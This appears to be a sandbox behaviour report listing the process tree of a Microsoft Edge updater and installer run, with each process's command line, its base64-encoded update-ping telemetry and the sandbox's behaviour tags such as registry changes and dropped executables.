C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.157.61\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.157.61\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.157.61\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.157.61\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.157.61\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.157.61\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNTcuNjEiIHNoZWxsX3ZlcnNpb249IjEuMy4xNTcuNjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NjU1N0JEN0QtOTdCOS00OEUxLTlCNTYtNzE3REY1ODg5NTc5fSIgdXNlcmlkPSJ7RTExQjcxRjktODhGQi00OTY1LTg1MjItRUE0MTZFNjVBMkZBfSIgaW5zdGFsbHNvdXJjZT0iY2hyb21lcmVjb3ZlcnkiIHJlcXVlc3RpZD0iezc0RjEzQzFBLTFDNkEtNEMyRi04NTg3LUFGNTRBN0RFQ0UyQX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgbG9naWNhbF9jcHVzPSIyIiBwaHlzbWVtb3J5PSI0IiBkaXNrX3R5cGU9IjIiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMTkwNDEuMTI4OCIgc3A9IiIgYXJjaD0ieDY0Ii8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEuMy4xNTcuNjEiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGluc3RhbGxfdGltZV9tcz0iNzk5Ii8-PC9hcHA-PC9yZXF1ZXN0Pg5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /machine /installsource chromerecovery3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNTcuNjEiIHNoZWxsX3ZlcnNpb249IjEuMy4xNTcuNjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTVCRTA0MEQtNTgwNy00MUU1LTlDREYtN0QyQTVFMDlCMzgyfSIgdXNlcmlkPSJ7RTExQjcxRjktODhGQi00OTY1LTg1MjItRUE0MTZFNjVBMkZBfSIgaW5zdGFsbHNvdXJjZT0iY2hyb21lcmVjb3ZlcnkiIHJlcXVlc3RpZD0iezA4NDQ3QThFLTA4NDYtNDJFQS1BM0U0LTZCRTI5NDgxRkI2RH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgbG9naWNhbF9jcHVzPSIyIiBwaHlzbWVtb3J5PSI0IiBkaXNrX3R5cGU9IjIiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMTkwNDEuMTI4OCIgc3A9IiIgYXJjaD0ieDY0Ii8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249Ijg5LjAuNDM4OS4xMTQiIG5leHR2ZXJzaW9uPSI4OS4wLjQzODkuMTE0IiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIzOCIgaW5zdGFsbGRhdGU9Ii00IiBpbnN0YWxsZGF0ZXRpbWU9IjE2NDk5NjE4MjkiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSI1IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PC9hcHA-PC9yZXF1ZXN0Pg2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{A24F50E6-0EE2-44DC-968F-94D155487030}\MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{A24F50E6-0EE2-44DC-968F-94D155487030}\MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe" /update /sessionid "{A5BE040D-5807-41E5-9CDF-7D2A5E09B382}"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{A5BE040D-5807-41E5-9CDF-7D2A5E09B382}"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.161.35\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.161.35\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.161.35\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.161.35\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.161.35\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.161.35\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNjEuMzUiIHNoZWxsX3ZlcnNpb249IjEuMy4xNTcuNjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTVCRTA0MEQtNTgwNy00MUU1LTlDREYtN0QyQTVFMDlCMzgyfSIgdXNlcmlkPSJ7RTExQjcxRjktODhGQi00OTY1LTg1MjItRUE0MTZFNjVBMkZBfSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7OTBBNzVEODMtNDhGMy00QzFFLUFDNDktOTg5QUQ4RTc3QUZDfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSJEQURZIiBwcm9kdWN0X25hbWU9IlN0YW5kYXJkIFBDIChRMzUgKyBJQ0g5LCAyMDA5KSIvPjxleHAgZXRhZz0iJnF1b3Q7cjQ1MnQxK2syVGdxL0hYemp2Rk5CUmhvcEJXUjlzYmpYeHFlVURIOXVYMD0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE1Ny42MSIgbmV4dHZlcnNpb249IjEuMy4xNjEuMzUiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBleHBlcmltZW50cz0iY2hyb21lcmVjMz0yMDIyMjFSIiBpbnN0YWxsYWdlPSIwIiBpbnN0YWxsZGF0ZXRpbWU9IjE2NTMyOTYwNzEiPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48L2FwcD48L3JlcXVlc3Q-4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNTcuNjEiIHNoZWxsX3ZlcnNpb249IjEuMy4xNTcuNjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTVCRTA0MEQtNTgwNy00MUU1LTlDREYtN0QyQTVFMDlCMzgyfSIgdXNlcmlkPSJ7RTExQjcxRjktODhGQi00OTY1LTg1MjItRUE0MTZFNjVBMkZBfSIgaW5zdGFsbHNvdXJjZT0iY2hyb21lcmVjb3ZlcnkiIHJlcXVlc3RpZD0ie0ZDMzYyRkJFLUEyMTAtNDczNC04MjJGLTdGNzFCRjM3QUU2RX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgbG9naWNhbF9jcHVzPSIyIiBwaHlzbWVtb3J5PSI0IiBkaXNrX3R5cGU9IjIiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMTkwNDEuMTI4OCIgc3A9IiIgYXJjaD0ieDY0Ii8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O1ZQUW9QMUYrZnExNXdSemgxa1BMNFBNcFdoOE9STUI1aXp2ck9DL2NoalE9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNTcuNjEiIG5leHR2ZXJzaW9uPSIxLjMuMTYxLjM1IiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNocm9tZXJlYzM9MjAyMjIxUiIgaW5zdGFsbGFnZT0iMCI-PHVwZGF0ZWNoZWNrLz48ZXZlbnQgZXZlbnR0eXBlPSIxMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDIzODM4IiBleHRyYWNvZGUxPSIwIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJkbyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvM2QxZjM5YTUtNDI1Ny00NWIyLTlhYTctNTJhNWI4MDE0ZWY2P1AxPTE2NTM4OTM2ODkmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9ZGNSQk1pcWdFNCUyYk55SWUyS0FLaEw2TzVxTkMzdEpjdHZTR1RBcERkSiUyZnczS091OEQ4RTF4JTJiJTJiQlhYOXI1b2hHTHQ3bUJXYU5iJTJiMzlVaXBubyUyYnB2aVElM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIwIiB0b3RhbD0iMCIgZG93bmxvYWRfdGltZV9tcz0iNSIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy8zZDFmMzlhNS00MjU3LTQ1YjItOWFhNy01MmE1YjgwMTRlZjY_UDE9MTY1Mzg5MzY4OSZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1kY1JCTWlxZ0U0JTJiTnlJZTJLQUtoTDZPNXFOQzN0SmN0dlNHVEFwRGRKJTJmdzNLT3U4RDhFMXglMmIlMmJCWFg5cjVvaEdMdDdtQldhTmIlMmIzOVVpcG5vJTJicHZpUSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE4MzU0NTYiIHRvdGFsPSIxODM1NDU2IiBkb3dubG9hZF90aW1lX21zPSIxNjM5Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxwaW5nIHI9IjM4IiByZD0iNTU4MyIgcGluZ19mcmVzaG5lc3M9IntBOTJCRDA5NC04RDRFLTQ4QzctODk5OS05RkJDNzcxNzU5OUN9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjkyLjAuOTAyLjY3IiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGxhc3RfbGF1bmNoX3RpbWU9IjEzMjk3NzY5NDQ5MzEzOTg4Ij48dXBkYXRlY2hlY2svPjxwaW5nIGFjdGl2ZT0iMSIgYT0iLTEiIHI9IjM4IiBhZD0iLTEiIHJkPSI1NTgzIiBwaW5nX2ZyZXNobmVzcz0ie0E4Q0NBRDg3LTVFN0MtNDg3MC04MTk1LUIzQTUxMkY0OEFFRH0iLz48L2FwcD48L3JlcXVlc3Q-2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{613F5B52-8BA7-4DF8-913D-DB0653388D7D}\MicrosoftEdge_X64_101.0.1210.53.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{613F5B52-8BA7-4DF8-913D-DB0653388D7D}\MicrosoftEdge_X64_101.0.1210.53.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{613F5B52-8BA7-4DF8-913D-DB0653388D7D}\EDGEMITMP_4E0CA.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{613F5B52-8BA7-4DF8-913D-DB0653388D7D}\EDGEMITMP_4E0CA.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{613F5B52-8BA7-4DF8-913D-DB0653388D7D}\EDGEMITMP_4E0CA.tmp\MSEDGE.PACKED.7Z" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
- System policy modification
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNjEuMzUiIHNoZWxsX3ZlcnNpb249IjEuMy4xNTcuNjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OUQ0RDA5MDgtQzY4Mi00QzUwLUE4NzktQkUxQzZFRTdCRTMwfSIgdXNlcmlkPSJ7RTExQjcxRjktODhGQi00OTY1LTg1MjItRUE0MTZFNjVBMkZBfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins5REY2NzNDNC02QjdCLTQ2ODEtQkNDMi0wNTIwOUUzRTA3RDV9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IkRBRFkiIHByb2R1Y3RfbmFtZT0iU3RhbmRhcmQgUEMgKFEzNSArIElDSDksIDIwMDkpIi8-PGV4cCBldGFnPSImcXVvdDtyNDUydDErazJUZ3EvSFh6anZGTkJSaG9wQldSOXNialh4cWVVREg5dVgwPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTYxLjM1IiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNocm9tZXJlYzM9MjAyMjIxUiIgaW5zdGFsbGFnZT0iMCIgY29ob3J0PSJycmZAMC44NyI-PHVwZGF0ZWNoZWNrLz48cGluZyByZD0iNTYyMSIgcGluZ19mcmVzaG5lc3M9Ins0QzU3QjRFRi0wNDM2LTQyRDgtOUE5NS1FMDczREFBNEY3NDZ9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjkyLjAuOTAyLjY3IiBuZXh0dmVyc2lvbj0iMTAxLjAuMTIxMC41MyIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBsYXN0X2xhdW5jaF90aW1lPSIxMzI5Nzc2OTQ0OTMxMzk4ODAiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMCIgZXJyb3Jjb2RlPSItMjE0NzAyMzgzOCIgZXh0cmFjb2RlMT0iMCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzLzQ5MjVmMDBiLWFhYjktNDk5OS05YTAwLTA0MjZhMzY5ZWNhMz9QMT0xNjUzODk0MDQ2JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PVVJOUQ5T0NHNzRmbkszRFhOJTJiZTIzMFNBT0JCNmZBbkV4VUNRTGNxQUNqVDI0RWZ4MGIzRjVKUWc1UzliWDElMmY1VkJMd2hhdzZNSDVpVzFOJTJiNDA1ciUyYnclM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIwIiB0b3RhbD0iMCIgZG93bmxvYWRfdGltZV9tcz0iMyIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy80OTI1ZjAwYi1hYWI5LTQ5OTktOWEwMC0wNDI2YTM2OWVjYTM_UDE9MTY1Mzg5NDA0NiZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1VSTlEOU9DRzc0Zm5LM0RYTiUyYmUyMzBTQU9CQjZmQW5FeFVDUUxjcUFDalQyNEVmeDBiM0Y1SlFnNVM5YlgxJTJmNVZCTHdoYXc2TUg1aVcxTiUyYjQwNXIlMmJ3JTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMTIwODA3ODQ4IiB0b3RhbD0iMTIwODA3ODQ4IiBkb3dubG9hZF90aW1lX21zPSIxNzI3NDkiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NjA4IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iMjE2MCIgZG93bmxvYWRfdGltZV9tcz0iMTc5MDI4IiBkb3dubG9hZGVkPSIxMjA4MDc4NDgiIHRvdGFsPSIxMjA4MDc4NDgiIHBhY2thZ2VfY2FjaGVfcmVzdWx0PSIwIiBpbnN0YWxsX3RpbWVfbXM9IjE5NTA1Ii8-PH